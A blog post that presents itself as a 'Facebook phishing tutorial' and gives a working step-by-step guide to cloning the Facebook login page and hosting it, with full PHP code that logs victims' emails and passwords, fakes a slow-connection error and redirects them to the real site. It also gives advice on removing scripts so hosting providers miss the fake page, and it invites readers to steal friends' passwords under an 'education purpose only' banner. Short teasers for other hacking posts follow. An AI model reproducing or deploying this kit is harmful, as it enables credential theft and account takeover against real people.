Facebook Phishing Tutorial

Welcome to My First Blog Post!!

                                                                     ******Education purpose only******


Want to Prank on your Friends? or Get a Password of a Friend so Badly, Then This is Right Place for you,

Hopefully you will get clear Understanding about what Phishing is and How to avoid from that from this Blog
Lean, Avoid BE-SAFE
Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details (and, indirectly, money), often for malicious reasons, by disguising as a trustworthy entity in an electronic communication.

Spear phishing
Phishing attempts directed at specific individuals or companies have been termed spear phishing.

Clone phishing
Clone phishing is a type of phishing attack whereby a legitimate, and previously delivered, email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email.

Social Engineering
Users can be incentivised to click on various kinds of unexpected content for a variety of technical and social reasons. For example, a malicious attachment might masquerade as a benign linked Google doc.
Alternatively users might be outraged by a fake news story, click a link and become infected.

And there are Much More Phishing Methods You can Follow them by here

Before you Start doing Phishing You must Know How to Avoid being Phished 


 First of all You Should Know about HTTP and HTTPS
HTTPS is secure most of the time and always check the URL even though the Interface looks similar, for example this tutorial teaches you about creating phishing site for FACEBOOK its URL is not Original Legit URL.

Keep your Eye on Spam emails you get, Do not go to any link you don't trust. Some times they seems like they came from Legit email senders, you must be very careful about giving away your passwords and all that from those Phishing Sites.

Okay Now How to Make a Phishing Site..

How to do phishing


Step 01.

Go to Facebook home page.

Right click -> save as ( save as type should be "Web Page, Complete ) -> save


Step 02.

Let's edit "Facebook - Log In or Sign Up.html" file.
 Search "action="


Replace the "https://www.facebook.com/login.php?login_attempt=1&lwv=110" with
sendEmail.php ( You can Use 'anyname.php')



there are some ajax codes inside this html file that communicate with the original facebook server. 
That Recognize the fake page in a Second it prevents us from hosting this phishing page in web hosting servers. So you have to make sure that you delete all ajax scripts in the .html file

You will find the ajax removed html file and all files at end of the tutorial here

Save the html Doc.

Step 03.

Open a Notepad and type The Code and save as ".php" file




_-------------------------------------------------------------------------------------------------------------------------_
_-------------------------------------------------------------------------------------------------------------------------_


<?php
$email = $_POST['email'];
$password = $_POST['pass'];
$message= $email."  ".$password;

// Send the email which contains credentials. This method is better when free hosting
//mail('xxxxxxxxx@gmail.com', 'My Subject', $message);
// when running locally writing to a file is better for checking purposes

$myfile = fopen("newfile.txt", "a") or die("Unable to open file!");
fwrite($myfile, $message);
fclose($myfile);



// This Message Will Give Realistic error and returns to a original facebook login showing it as technical issue

echo 'Internet connection is slow ... ';

//redirecting user to a closed facebook Original login location

header('Refresh: 2; URL=https://www.facebook.com/login/?next=https%3A%2F%2Fwww.facebook.com%2Fgroups%2Fonlinehelpz%2F');
?>

_-------------------------------------------------------------------------------------------------------------------------_
_-------------------------------------------------------------------------------------------------------------------------_

From this Code You can Send the Victims Details Directly to your email, Some free web hosting site allow email services with those you Can Send a Email too...
Examine the Code for that..

For Now You Dont Need to worry about those Just Copy and Paste the Code as PHP File


 $myfile = fopen("newfile.txt", "a") or die("Unable to open file!");

This is where we will store our Data
so Create a nother .txt file named "newfile.txt"

You Can Find All Files from Here
https://github.com/PasanRS/Phishing


Step 04.

Rename "Facebook_Log_In_or_Sign_Up.html" to "Index.html"
keep all Files in one Folder

Index.html
sendEmail.php
newfile.txt
Facebook_Log_In_or_Sign_Up_Files                         // (Folder)


Step 05.


Now Create a Account in Free Hosting Site Like "www.000webhost.com"

  FileManager-> Upload files now ->

Upload all the Files to there






Thats it... Now your Phishing Site is Created..












NOTE: HOSTING SITES CAN DETECT PHISHING SITES BY AJAXs IN THE WEB PAGE MAKE SURE TO REMOVE ALL AJAXs IN INDEX PAGE OR ELSE YOUR HOSTING ACCOUNT WILL GET SUSPENDED IMMEDIATELY 




Comments

Post a Comment

Popular posts from this blog

Attacks Against Weak Token Generation

Attacks Against Weak Token Generation During our last post to this we discusses about basics of Session Management Attack which is also known as session hacking. In this post we will have a look on how you can attack weak token generation method to attack session management. Following are most common methods of generating weak tokens, Using meaningful tokens Predictable token generation Adding time dependent variations in tokens Now some important things before we discus real hack steps. In applications that use standard cookie mechanism for transmitting session tokens, it is easy to identify which item of data contains the token. In other cases it needs real brain work to identify them. Many web developers add extra tokens to cookies to fool hackers for example an application might add 14 tokens to yours browser's store, out of which only six are responsible for session management no matter what value other eight have only six of them will hand...
Read more

Some Terminologies You Should Know About Trojans

Image
Some Terminologies You Should Know About Trojans in this following post we will discus some most frequently used terminologies that we usually hear when word Trojan pops out. They are discussed here because after knowing them you'll be able to understand how attacker manages to circulate RAT server, hide its presence and also bypasses firewall rules. Over And Covert Channel: A channel here describes means of communication. An overt channel means legal, obvious or known where as covert means hidden and concealed. In other words overt means legal means of communication whereas covert means illegal means of communication. In technical terms overt channel follows rules by TCP/IP suite where as covert channel exploit weakness of TCP/IP model for illegal communication. Wrappers: Wrappers are programs that helps binding two files together. They can bind either multiple files of same extension or multiple files with multiple extension. Wrappers are ...
Read more

Nmap Scanning

Image
Nmap best known as hacker’s best friend may it be ethical or criminal is one of the best known network scanners available today. Today nearly each and every hacker uses nmap as network scanning tool and even pen-testing tools are bundled with Nmap as basic port scanning tool. Nmap can scan network, ports, services and also garb OS. This tutorial is written keeping this in mind that everyone should be able to grasp all commands and switches given in this tutorial in single reading. Do you think it’s impossible so why not give a try. First we divide switches into four types, 1.Synchronous Scans 2.Ping Scans 3.Time Scans 4.Output Type Synchronous Scan :All synchronous scans start with “-s”(without quotes), note that the ‘s’ denoting synchronous is not capital. Now a basic synchronous scan command is written as follows, nmap -s[synchronous scan type] ip_address ---------------------------------------------- -sT Synchronous TCP scan -sS Synchronous Stea...
Read more